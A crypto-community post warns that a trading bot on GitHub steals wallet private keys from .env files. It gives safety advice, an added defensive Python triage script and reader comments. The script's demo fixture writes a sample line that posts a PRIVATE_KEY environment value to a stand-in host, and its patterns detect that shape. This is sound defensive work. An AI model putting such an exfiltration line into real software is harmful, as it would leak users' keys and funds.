Recently, the security community discovered a serious vulnerability: a well-known prediction platform's copy trading robot contains malicious code hidden in its GitHub repository.
The situation is as follows: once the user runs this program, it automatically reads the ".env" file on the computer. It seems harmless, right? The problem is that many developers store their wallet private keys in this file. Once read, the private keys are immediately sent to the hacker's server, and your funds are gone.
What's even more heartbreaking is that the author of this program keeps revising the code and uploading it to GitHub repeatedly, making it seem like they are continuously optimizing the functionality. In reality? Each update is improving the method of stealing private keys, as if they are "polishing their tools".
The concealment of this type of attack is particularly strong — the code looks normal, and the functions work, but secretly your core assets have already been sold. This makes it very easy for newcomers who are just entering the space to fall for it.
**Protection Advice:** Before downloading any trading bot, it's best to have someone who understands code review the GitHub source code for you; never store your private key in configuration files like .env; using multi-signature wallets and hardware wallets can significantly reduce risk. In the world of Web3, security awareness is the best firewall.
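The advice above boils down to two checks a reviewer can actually run before executing a downloaded bot: does any source file both pull values from the environment or `.env` and make outbound network calls (the exfiltration shape the post describes), and does any `.env` file hold a value shaped like a raw wallet private key. The script below is an added example for this post, not code from the original post or from any bot or platform it mentions; the regex patterns, the `build_demo_repo` fixture and every file name and value in it are constructed for the demonstration.

```python
"""Pre-run triage for a downloaded trading-bot repository (added example, constructed data).

Check 1: flag source files that both read environment/.env data AND make outbound
         network calls. Legitimate bots do both, so a hit means "read this file by
         hand", not "this is malware".
Check 2: flag .env lines whose value looks like a raw EVM-style private key
         (optional 0x followed by exactly 64 hex digits). Such a value should live
         in a hardware or multisig wallet, not in a config file.
"""
import re
import tempfile
from pathlib import Path

# Signs that code pulls values from the environment or reads a .env file.
ENV_READ_PATTERNS = [
    r"load_dotenv\s*\(",                      # python-dotenv
    r"dotenv\.config\s*\(",                   # Node dotenv
    r"os\.environ",                           # Python environment access
    r"os\.getenv\s*\(",
    r"process\.env",                          # Node environment access
    r"open\s*\(\s*['\"]\.env['\"]",           # direct read of the .env file (Python)
    r"readFileSync\s*\(\s*['\"]\.env['\"]",   # direct read of the .env file (Node)
]
# Signs of outbound network activity.
NETWORK_PATTERNS = [
    r"requests\.(post|get|put)\s*\(",
    r"urllib\.request",
    r"http\.client",
    r"socket\.socket\s*\(",
    r"\bfetch\s*\(",
    r"axios\.(post|get)\s*\(",
    r"https?\.request\s*\(",
]
ENV_READ_RE = re.compile("|".join(ENV_READ_PATTERNS))
NETWORK_RE = re.compile("|".join(NETWORK_PATTERNS))

# KEY=value line whose value is an optional 0x plus exactly 64 hex digits.
PRIVKEY_LINE_RE = re.compile(
    r"^\s*[A-Za-z0-9_]+\s*=\s*['\"]?(0x)?[0-9a-fA-F]{64}['\"]?\s*$"
)
SOURCE_SUFFIXES = {".py", ".js", ".ts", ".mjs"}


def flag_env_exfil_shape(repo: Path) -> list[str]:
    """Relative paths of source files that both read env data and talk to the network."""
    flagged = []
    for path in sorted(repo.rglob("*")):
        if not path.is_file() or path.suffix not in SOURCE_SUFFIXES:
            continue
        text = path.read_text(errors="ignore")
        if ENV_READ_RE.search(text) and NETWORK_RE.search(text):
            flagged.append(path.relative_to(repo).as_posix())
    return flagged


def find_private_keys_in_env(repo: Path) -> list[tuple[str, int]]:
    """(relative path, line number) for .env* lines holding a raw-private-key-shaped value."""
    hits = []
    for path in sorted(repo.rglob(".env*")):
        if not path.is_file():
            continue
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if PRIVKEY_LINE_RE.match(line):
                hits.append((path.relative_to(repo).as_posix(), lineno))
    return hits


def build_demo_repo() -> Path:
    """Create a constructed repository mimicking the pattern in the post (demo data only)."""
    root = Path(tempfile.mkdtemp(prefix="bot-triage-"))
    (root / "bot").mkdir()
    # Loads .env but never touches the network: not flagged by check 1.
    (root / "bot" / "config.py").write_text(
        "from dotenv import load_dotenv\nload_dotenv()\nSLIPPAGE = 0.01\n"
    )
    # Reads the environment and posts outward: the shape check 1 reports for manual review.
    (root / "bot" / "telemetry.py").write_text(
        "import os, requests\n"
        "def report():\n"
        "    requests.post('https://example.invalid/collect',\n"
        "                  json={'k': os.environ.get('PRIVATE_KEY')})\n"
    )
    # Constructed .env; the key value is a fake 64-hex string, not a real key.
    (root / ".env").write_text(
        "RPC_URL=https://rpc.example.invalid\n"
        "PRIVATE_KEY=0x" + "1234567890abcdef" * 4 + "\n"
        "LOG_LEVEL=info\n"
    )
    return root


if __name__ == "__main__":
    repo = build_demo_repo()
    print("read env + network, review by hand:", flag_env_exfil_shape(repo))
    print("private-key-shaped .env values:    ", find_private_keys_in_env(repo))
```

Run it against a cloned repository by pointing `flag_env_exfil_shape` and `find_private_keys_in_env` at the checkout directory instead of the demo fixture. The first check is deliberately noisy: a trading bot legitimately reads configuration and talks to RPC endpoints, so its output is a reading list for the reviewer the post recommends, not a verdict. The second check is the one that should come back empty on your own machine.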
TokenTherapist
· 13h ago
Wow, they dare to blatantly modify the code like this, how funny.
Seriously, people who put their Private Key in env need to reflect on this.
Another story of a "get rich through copy trading" dream shattered.
This is why I never touch strangers' stuff on GitHub.
Every time there's talk about reviewing the code, but how many people actually look at it?
Hardware wallets are really eternal, this kind of thing is completely cut off.
Newbies are too easily played for suckers; security awareness needs to be built up from scratch.
tx_or_didn't_happen
· 12-22 20:58
Wow, this Hacker really knows how to play, modifying code while stealing keys, secretly polishing his tools for crime.
NullWhisperer
· 12-22 13:23
ngl the .env trick is almost too predictable at this point... been seeing variants of this for years tbh. what gets me is the repeated commits thing, like mate, if you're exfiltrating keys at least try to hide it
PuzzledScholar
· 12-21 04:12
Wow, this is too harsh, GitHub has now become a tool for others
The guys who put their Private Key in .env must be crying now
It's that old trick of changing disguises and repeatedly uploading, which can indeed fool a lot of newbies
Hardware wallets really need to be popularized, otherwise we'll be played for suckers sooner or later
Looks like I need to find a reliable coder to review the code before I dare to use it
No wonder they say Web3 is a game of trust, it's so hard to guard against
LiquidityWitch
· 12-21 04:12
Damn, here we go again with this trap, running the Private Key in the open is really outrageous.
This is why I never run other people's Bots; writing my own scripts is way better.
Newbie, wake up! Running without reviewing the source code is truly reckless.
It's always like this; they talk beautifully but secretly steal money.
A hardware wallet is really a standard requirement; how can there still be people who don't use one?
You have to make it a habit to check those repos on GitHub, or you'll lose your hard-earned money.
MEVHunterWang
· 12-21 04:10
What the heck, here comes the trap again. People who put their Private Key in env really need to reflect on themselves.
This is why I advise those around me to use a hardware wallet; really, don't save on this.
You can't skimp on code reviews; things on GitHub aren't necessarily reliable.
Newbies are the most likely to fall for this, thinking it's just a normal feature iteration.
Multi-signature Wallets are really nice; even if you get hacked, they can't empty all your funds.
This kind of covert attack is truly disgusting; it seems normal on the surface but secretly empties you out.
You need to be more vigilant; the trust cost in Web3 is too high.
SchrodingerAirdrop
· 12-21 04:03
Damn, is it this trick again? The code looks fine, but they turn around and steal your wallet.
The private key plaintext is stored in the env, really deserves it.
Those fox tails exposed on GitHub will be caught sooner or later, just afraid of those hidden ones.
Newbies should really not mess around, hardware wallets are really not expensive.
In this day and age, you have to find someone to review everything before you dare to run it.
A typical Trojan, perfect functionality but the private key is gone.
Makes me think of that wave of contract honeypots from two years ago, same trick but different soup.
BrokenRugs
· 12-21 03:58
Damn, here we go again, there are really traps everywhere on GitHub
Those who put their Private Key in .env must be really reckless
That's why I only use a hardware wallet, it's really exhausting
Code reviews really can't be skipped, newbies, please be more aware
This generation of Hackers is too competitive, their methods are really varied
FalseProfitProphet
· 12-21 03:55
What the hell, they've dug out another scam product, GitHub has really become a den of thieves
Those who put their Private Key in .env should really reflect on this, isn't this common sense?
This guy changes code like a pro, clearly a professional level
Isn't a hardware wallet nice? Why play with fire like this?
Those making quick money with such methods will end up in jail sooner or later
Newbies are really easy to fall for this, no wonder the scene is so chaotic.